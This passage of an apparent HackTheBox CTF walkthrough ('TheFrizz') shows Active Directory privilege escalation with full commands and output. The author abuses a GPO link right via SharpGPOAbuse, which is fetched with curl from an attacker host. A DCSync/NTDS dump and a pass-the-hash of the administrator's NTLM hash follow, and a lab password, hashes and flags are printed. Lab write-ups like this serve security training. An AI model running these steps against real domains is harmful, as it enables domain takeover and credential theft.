Thereby it has writegplink over the domain controllers:
Shell as m.schoolbus:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ impacket-getTGT 'frizz.htb/M.SchoolBus:!suBcig@MehTed!R' -dc-ip 10.129.20.43
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in M.SchoolBus.ccache
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ export KRB5CCNAME=M.SchoolBus.ccache
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ klist
Ticket cache: FILE:M.SchoolBus.ccache
Default principal: M.SchoolBus@FRIZZ.HTB
Valid starting Expires Service principal
09/18/2025 07:18:20 09/18/2025 17:18:20 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 09/19/2025 07:18:20
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ ssh m.schoolbus@frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>We can use various tools to abuse this GPO write link ACL. I will use sharpgpoabuse.exe:
PS C:\Users\M.SchoolBus> cd C:\Windows\Tasks
PS C:\Windows\Tasks> curl http://10.10.16.2/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 71168 100 71168 0 0 72640 0 --:--:-- --:--:-- --:--:-- 72620
PS C:\Windows\Tasks> ls
Directory: C:\Windows\Tasks
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 9/17/2025 6:57 PM 9760768 chisel.exe
-a--- 9/17/2025 9:21 PM 71168 SharpGPOAbuse.exeView sharpgpoabuse options and attacks:
PS C:\Windows\Tasks> .\SharpGPOAbuse.exe
Usage:
SharpGPOAbuse.exe <AttackType> <AttackOptions>
Attack Types:
--AddUserRights
Add rights to a user account
--AddLocalAdmin
Add a new local admin. This will replace any existing local admins!
--AddComputerScript
Add a new computer startup script
--AddUserScript
Add a new user startup script
--AddComputerTask
Add a new computer immediate task
--AddUserTask
Add a new user immediate task
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.
Options required to add a new user startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.
Options required to add a new computer startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.
Options required to add new user rights:
--UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
Set the account to add the new rights.
--GPOName
The name of the vulnerable GPO.
Options required to add a new computer immediate task:
--TaskName
Set the name of the new computer task.
--Author
Set the author of the new task (use a DA account).
--Command
Command to execute.
--Arguments
Arguments passed to the command.
Enable Target Filtering for user immediate tasks.
--TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
The targeted user's SID.
Other options:
--DomainController
Set the target domain controller.
--Domain
Set the target domain.
--Force
Overwrite existing files if required.So we can abuse this write link with a variety of attacks one of them being adding our selves to the local administrators group.
But first we have to create a GPO, and link it to the domain controllers OU:
PS C:\Windows\Tasks> New-GPO -Name "Windows Firewall GPO" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
GpoId : 68ce3cbc-c645-4c4e-9bcc-ebd0f9bd61c0
DisplayName : Windows Firewall GPO
Enabled : True
Enforced : False
Target : OU=Domain Controllers,DC=frizz,DC=htb
Order : 3Now we can abuse that GPO with sharpgpoabuse:
PS C:\Windows\Tasks> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPONAME "Windows Firewall GPO"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of m.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "Windows Firewall GPO" is: {68CE3CBC-C645-4C4E-9BCC-EBD0F9BD61C0}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{68CE3CBC-C645-4C4E-9BCC-EBD0F9BD61C0}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!Now we should update the policies:
PS C:\Windows\Tasks> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.Check if we are now admins:
PS C:\Windows\Tasks> net user m.schoolbus
User name M.SchoolBus
Full Name Marvin SchoolBus
Comment Desktop Administrator
User''s comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/29/2024 7:27:03 AM
Password expires Never
Password changeable 10/29/2024 7:27:03 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/17/2025 9:19:45 PM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users *Desktop Admins
The command completed successfully.
PS C:\Windows\Tasks> exit
Connection to frizz.htb closed.
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u m.schoolbus -p '!suBcig@MehTed!R'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\m.schoolbus:!suBcig@MehTed!R (Pwn3d!)Post-Exploitation:
DCSync Attack:
We can now perform the DCSync attack to get the ntlm hash of the domain administrator.
I will do that by use netexec this time:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u m.schoolbus -p '!suBcig@MehTed!R' --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n]
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\m.schoolbus:!suBcig@MehTed!R (Pwn3d!)
SMB frizzdc.frizz.htb 445 frizzdc [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB frizzdc.frizz.htb 445 frizzdc Administrator:500:aad3b435b51404eeaad3b435b51404ee:c457b5f1c315bef53b9cabc92e993d0b:::
<snipped>We can now get the flags:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/TheFrizz]
└─$ nxc smb frizzdc.frizz.htb -k -u administrator -H c457b5f1c315bef53b9cabc92e993d0b -X 'whoami;hostname;ipconfig;type C:\Users\Administrator\Desktop\root.txt;type C:\Use
rs\f.frizzle\Desktop\user.txt'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\administrator:c457b5f1c315bef53b9cabc92e993d0b (Pwn3d!)
SMB frizzdc.frizz.htb 445 frizzdc [+] Executed command via wmiexec
SMB frizzdc.frizz.htb 445 frizzdc frizz\administrator
SMB frizzdc.frizz.htb 445 frizzdc frizzdc
SMB frizzdc.frizz.htb 445 frizzdc Windows IP Configuration
SMB frizzdc.frizz.htb 445 frizzdc Ethernet adapter Ethernet0 2:
SMB frizzdc.frizz.htb 445 frizzdc Connection-specific DNS Suffix . : .htb
SMB frizzdc.frizz.htb 445 frizzdc IPv6 Address. . . . . . . . . . . : dead:beef::339b:6039:c571:9f0c
SMB frizzdc.frizz.htb 445 frizzdc Link-local IPv6 Address . . . . . : fe80::903f:7dc4:c0ba:362e%5
SMB frizzdc.frizz.htb 445 frizzdc IPv4 Address. . . . . . . . . . . : 10.129.20.43
SMB frizzdc.frizz.htb 445 frizzdc Subnet Mask . . . . . . . . . . . : 255.255.0.0
SMB frizzdc.frizz.htb 445 frizzdc Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%5
SMB frizzdc.frizz.htb 445 frizzdc 10.129.0.1
SMB frizzdc.frizz.htb 445 frizzdc #< CLIXML
SMB frizzdc.frizz.htb 445 frizzdc 4ebba94604de0fcec8619fe5d85143ee
SMB frizzdc.frizz.htb 445 frizzdc 32f33794e20e852937ce93e1d75ea46f
SMB frizzdc.frizz.htb 445 frizzdc <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId
="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0<
/AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>Last updated